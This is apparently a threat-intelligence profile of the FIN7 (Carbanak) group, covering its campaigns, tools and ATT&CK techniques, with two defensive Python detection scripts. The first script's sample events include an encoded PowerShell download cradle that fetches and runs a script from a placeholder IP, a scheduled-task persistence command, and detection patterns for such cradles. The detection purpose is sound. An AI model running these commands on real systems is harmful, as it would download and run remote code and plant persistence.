blacktemple.net · Cybersecurity News & Analysis · github: defconxt · © 2026
FIN7

Also known as: Carbanak · Sangria Tempest · Carbon Spider · ELBRUS · ITG14

Category: cybercrime
Nation: 🇷🇺 Russia
Active Since: 2013
Targets: Retail, Hospitality, Financial Services, Restaurant, Healthcare
Known Tools: Carbanak, GRIFFON, BIRDWATCH, CROWVIEW, POWERPLANT, PILLOWMINT, Cobalt Strike, Metasploit
MITRE ATT&CK: T1566.001 (Spearphishing Attachment), T1059.001 (PowerShell), T1059.003 (Windows Command Shell), T1053.005 (Scheduled Task), T1071.001 (Web Protocols), T1027 (Obfuscated Files or Information), T1055 (Process Injection), T1105 (Ingress Tool Transfer), T1560 (Archive Collected Data), T1021.001 (Remote Desktop Protocol)
References: MITRE ATT&CK, DOJ Indictment (2018), Mandiant FIN7 Evolution, Microsoft Sangria Tempest

Background

FIN7, also tracked as Carbanak and Sangria Tempest, is one of the most prolific financially motivated cybercrime groups on record. It emerged around 2013 and initially targeted banks directly with the Carbanak backdoor; the Carbanak heists are estimated to have taken up to $1 billion from over 100 financial institutions in some 40 countries. One naming caveat: Carbanak is a piece of malware used by more than one crew, and Mandiant (see the FIN7 Evolution reference) tracks the bank-focused "Carbanak Group" separately from FIN7 even though the two share tooling, so attribution of the early bank heists specifically to FIN7 is not universally accepted. The group is believed to operate out of Russia and Ukraine, and members have been arrested in several countries.

Over time, FIN7 shifted its targeting from banks to the retail, restaurant, and hospitality sectors, focusing on point-of-sale (POS) systems to steal payment card data at scale. The group operated with a corporate-like structure, running a fake cybersecurity company called Combi Security (and later Bastion Secure) to recruit penetration testers who did not know that the "engagements" they were assigned were criminal intrusions.

In 2018, three senior members were arrested and subsequently prosecuted in the United States, but the group continued operations with minimal disruption. By 2020-2022, FIN7 pivoted toward ransomware, establishing partnerships with REvil, Maze, BlackCat/ALPHV, and DarkSide ransomware operations. The shift raised both the damage per intrusion and the group's revenue, since a single network access could now be monetized through extortion rather than card fraud.

Notable Campaigns

Carbanak Banking Heists (2013-2016): Operators using Carbanak compromised over 100 banks worldwide, manipulating SWIFT transfers, ATM networks, and e-payment systems. Roughly $1 billion was stolen, making this one of the largest cyber-enabled bank heists in history. Spear-phishing emails provided initial access, after which the attackers spent months conducting reconnaissance inside banking networks (including video capture of operator workstations) before executing coordinated cash-outs.

U.S. Restaurant and Retail Campaign (2016-2018): According to the 2018 DOJ indictment, the group compromised more than 6,500 individual POS terminals at more than 3,600 business locations across 47 U.S. states. Major victims included Chipotle, Chili's, Arby's, Red Robin, and Jason's Deli. The attackers used carefully crafted phishing emails impersonating suppliers, followed by deployment of the PILLOWMINT POS malware to harvest payment card data from memory.

Bastion Secure Front Company (2021): FIN7 created a fake cybersecurity firm called Bastion Secure, complete with a professional website and job postings. The company recruited legitimate IT professionals and had them conduct what they believed were penetration tests, but which were actually real intrusions against FIN7 targets. Gemini Advisory (a Recorded Future company) exposed the operation in October 2021.

Ransomware Partnerships (2020-2023): FIN7 operators provided initial access and tools to multiple ransomware-as-a-service operations, including REvil, DarkSide (the operation behind the Colonial Pipeline attack), BlackCat/ALPHV, and Maze. The group used its intrusion capabilities to breach high-value targets and then handed off to ransomware affiliates for encryption and extortion.

POWERTRASH and Lizar Campaigns (2021-2023): FIN7 deployed new tooling including the POWERTRASH loader and the Lizar (also called TIRION) post-exploitation framework, first reported by BI.ZONE in 2021, against U.S.-based organizations. Initial access came from malicious USB drives (the FBI warned in January 2022 that FIN7 was mailing BadUSB devices to U.S. organizations) and from phishing campaigns whose payloads used trusted cloud services for command and control.

Tactics, Techniques & Procedures

FIN7 is known for exceptionally well-crafted spear-phishing campaigns. Their phishing emails are highly targeted, often referencing specific business contexts relevant to the victim, and typically carry weaponized Microsoft Office documents with embedded macros or LNK files. The group has also used malicious USB drives shipped via postal mail as an initial access vector.

Once inside a network, FIN7 follows a methodical approach: they establish persistence using scheduled tasks and registry modifications, conduct extensive internal reconnaissance to map the network and identify high-value systems, and move laterally using stolen credentials and legitimate remote access tools. They are patient operators who may dwell in networks for months before taking action.

The group extensively uses living-off-the-land techniques, leveraging PowerShell, WMI, and built-in Windows utilities to blend in with legitimate activity. They also deploy custom tooling including their GRIFFON JavaScript backdoor, BIRDWATCH downloader, and the POWERPLANT backdoor framework. For command and control, they frequently abuse legitimate cloud services and DNS tunneling to evade network detection.

Tools & Malware

  • Carbanak: The group's signature backdoor, a full-featured remote access trojan capable of keylogging, screen capture, credential theft, and remote desktop control. Used extensively in banking heists.
  • GRIFFON: A lightweight JavaScript backdoor used for initial reconnaissance and payload delivery.
  • POWERPLANT: A large PowerShell-based backdoor framework with modular capabilities.
  • BIRDWATCH / CROWVIEW: .NET-based downloaders used in later campaigns for payload delivery.
  • PILLOWMINT: Custom POS malware designed to scrape payment card data from process memory.
  • Cobalt Strike: Commercially available adversary simulation tool heavily abused for post-exploitation.
  • Lizar (TIRION): A modular post-exploitation toolkit serving as a Carbanak successor.
  • POWERTRASH: An obfuscated PowerShell loader used to deploy various payloads in memory.

Indicators & Detection

Detection of FIN7 activity should be layered. At the mail gateway, watch for highly targeted phishing with weaponized Office attachments, especially messages impersonating suppliers or business partners or using food-industry and hospitality lures. Enforce macro policy rather than relying on user judgement: block macros in files that carry the Mark-of-the-Web (the Office "Block macros from running in Office files from the Internet" policy) and alert on VBA execution chains in which an Office process spawns a child process.

On endpoints, watch for PowerShell execution with heavy obfuscation or encoded commands, scheduled task creation for persistence, and process injection into legitimate Windows processes. FIN7 frequently uses mshta.exe, wscript.exe, and cscript.exe to execute malicious scripts, so an Office application spawning one of these, or a script host running content from a user-writable path, is a strong signal. These checks need command-line visibility: collect Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled, plus PowerShell Script Block Logging (Event ID 4104), which records the decoded content of encoded and obfuscated commands. Monitor for unusual DNS query patterns (many unique, long, high-entropy subdomains under a single domain) that may indicate DNS tunneling for C2 communication.
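As an added example (not part of the original profile), the following Python script applies the endpoint checks above to constructed Sysmon-style process-creation records: an Office parent spawning a script host, mshta/wscript/cscript running content from a user-writable path, encoded PowerShell carrying a download cradle with a hidden window, and a schtasks persistence entry whose action is a script host. The event records, paths and the 203.0.113.10 address are constructed sample data; the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine) and the reason strings are this example's own naming.

```python
"""Flag FIN7-style execution chains in process-creation telemetry (added example)."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
LOLBIN_SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Paths an ordinary user can write to; script hosts running content from here is a red flag.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Public|Downloads|ProgramData)\\", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is base64 of UTF-16LE.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
CRADLE = re.compile(r"iex|invoke-expression|downloadstring|downloadfile|"
                    r"invoke-webrequest|frombase64string", re.I)


def image_name(path):
    """Lower-case file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none (or it is not valid)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample: the classic cradle, encoded as an attacker would pass it on the command line.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')"

# Constructed Sysmon Event ID 1 records (not real telemetry). Records 3, 5 and 6 are benign controls.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\jdoe\AppData\Local\Temp\invoice.hta"'},
    {"RecordId": 2, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE_SCRIPT)},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\Documents\notes.txt"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 30 /tn "OneDriveUpdate" '
                    r'/tr "wscript.exe C:\Users\jdoe\AppData\Roaming\upd.js"'},
    {"RecordId": 5, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"RecordId": 6, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Program Files\Corp\inventory.ps1"},
]


def score_event(ev):
    """Return the list of reasons an event is suspicious (empty for benign events)."""
    reasons = []
    image = image_name(ev["Image"])
    parent = image_name(ev["ParentImage"])
    cmd = ev["CommandLine"]

    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office_spawns_script_host")
    if image in LOLBIN_SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
        reasons.append("script_host_user_writable_path")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded_powershell")
        if HIDDEN_WINDOW.search(cmd):
            reasons.append("hidden_window")
        # Search the decoded script when present, otherwise the raw command line.
        if CRADLE.search(decoded if decoded is not None else cmd):
            reasons.append("download_cradle")
    if image == "schtasks.exe" and "/create" in cmd.lower():
        action = cmd.lower()
        if any(h in action for h in LOLBIN_SCRIPT_HOSTS | {"powershell", "cmd.exe"}) \
                or USER_WRITABLE.search(cmd):
            reasons.append("scheduled_task_persistence")
    return reasons


def triage(events):
    """Map RecordId -> reasons for every event that tripped at least one check."""
    hits = {}
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits[ev["RecordId"]] = reasons
    return hits


if __name__ == "__main__":
    for record_id, reasons in triage(SAMPLE_EVENTS).items():
        print(record_id, ", ".join(reasons))
```

Run as-is it reports records 1, 2 and 4 and stays silent on the three benign controls; note that record 6 (an unencoded, non-hidden PowerShell invocation of a script under Program Files) is deliberately not flagged, which is the kind of allow-listing you need to keep a rule like this from paging on every admin script. The encoded-command decoder is the piece most worth keeping: without it, `-enc` payloads look like random base64 and the cradle check never fires.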

Network-level detection should focus on beaconing patterns to cloud services (especially service endpoints rarely seen in your environment), large outbound transfers to external destinations, and lateral movement such as anomalous RDP and SMB connections between workstations. Deploy POS-specific monitoring on payment processing systems to detect memory scraping, for example unexpected processes opening handles to the payment application's memory. Behavioral analytics that baseline normal user and system activity are particularly effective against FIN7's patient, low-and-slow operational style.
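As a second added example, also not from the original page, this Python script demonstrates the two network heuristics referred to above on constructed logs: beacon detection from the regularity of connection inter-arrival times (coefficient of variation of the gaps between connections for one source/destination pair), and DNS-tunnel detection from the number, length and entropy of subdomain labels under one registered domain. The connection and DNS records, the addresses 10.0.0.15, 10.0.0.22, 203.0.113.10 and 198.51.100.7, and the domains cdn-sync.test and example.com are constructed sample data; the two-label registered-domain cut is a simplification (a real deployment would use the Public Suffix List), and the thresholds are starting points to tune against your own baseline.

```python
"""Beaconing and DNS-tunnel heuristics over constructed network logs (added example)."""
import hashlib
import math
import statistics
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character of s: 0 for a constant string, 4.0 for 16 evenly used symbols."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def interval_stats(timestamps):
    """Count, mean gap and coefficient of variation of the gaps between connections."""
    ts = sorted(timestamps)
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    if len(deltas) < 2:
        return None
    mean = statistics.mean(deltas)
    cv = statistics.pstdev(deltas) / mean if mean > 0 else float("inf")
    return {"count": len(ts), "mean_interval": mean, "cv": cv}


def find_beacons(conn_log, min_count=8, max_cv=0.2):
    """Source/destination pairs whose connection gaps are too regular to be a human."""
    by_pair = defaultdict(list)
    for ts, src, dst in conn_log:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, ts in by_pair.items():
        st = interval_stats(ts)
        if st and st["count"] >= min_count and st["cv"] <= max_cv:
            hits[pair] = st
    return hits


def registered_domain(fqdn):
    """Naive two-label cut (assumption: no Public Suffix List handling in this example)."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_dns_tunnels(dns_log, min_unique=10, min_label_len=30, min_entropy=3.0):
    """Registered domains with many unique, long, high-entropy leftmost labels."""
    by_domain = defaultdict(set)
    for _ts, _src, qname in dns_log:
        by_domain[registered_domain(qname)].add(qname.lower().rstrip("."))
    hits = {}
    for domain, names in by_domain.items():
        subs = [n[: -len(domain) - 1] for n in names if n.endswith("." + domain)]
        if len(subs) < min_unique:
            continue
        first_labels = [s.split(".")[0] for s in subs]
        mean_len = statistics.mean(len(lbl) for lbl in first_labels)
        mean_ent = statistics.mean(shannon_entropy(lbl) for lbl in first_labels)
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            hits[domain] = {"unique_names": len(subs), "mean_label_len": mean_len,
                            "mean_entropy": mean_ent}
    return hits


# Constructed data. BASE is an arbitrary epoch; JITTER imitates an implant's small randomised sleep.
BASE = 1_700_000_000
JITTER = [0, 2, -1, 1, 0, -2, 1, 0, 1, -1, 2, 0]
CONN_LOG = (
    # 10.0.0.15 checks in with 203.0.113.10 every ~60 s: a beacon.
    [(BASE + 60 * i + JITTER[i % len(JITTER)], "10.0.0.15", "203.0.113.10") for i in range(20)]
    # 10.0.0.22 browses 198.51.100.7 at human, bursty intervals: a control with the same order of count.
    + [(BASE + off, "10.0.0.22", "198.51.100.7") for off in (5, 300, 312, 2100, 2145, 2152, 3900, 4000, 8000)]
)


def _chunk_label(i):
    """Constructed hex label standing in for a tunnel's encoded data chunk."""
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48]


DNS_LOG = (
    [(BASE + 30 * i, "10.0.0.15", f"{_chunk_label(i)}.t.cdn-sync.test") for i in range(25)]
    + [(BASE + 7 * i, "10.0.0.22", name) for i, name in enumerate(
        ["www.example.com", "mail.example.com", "www.example.com", "api.example.org", "cdn.example.com"])]
)


if __name__ == "__main__":
    for pair, st in find_beacons(CONN_LOG).items():
        print("beacon", pair, f"n={st['count']} mean={st['mean_interval']:.1f}s cv={st['cv']:.3f}")
    for domain, st in find_dns_tunnels(DNS_LOG).items():
        print("dns-tunnel", domain, st)
```

The control pair is important: it has nine connections, enough to pass the count threshold, but its gaps vary by orders of magnitude, so only the regular pair is reported. Likewise the example.com queries are short, low-entropy labels under a domain with few unique names, so they fall out at the first check; tune min_unique upward in environments with large content-delivery or anti-malware domains that legitimately produce many unique subdomains.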
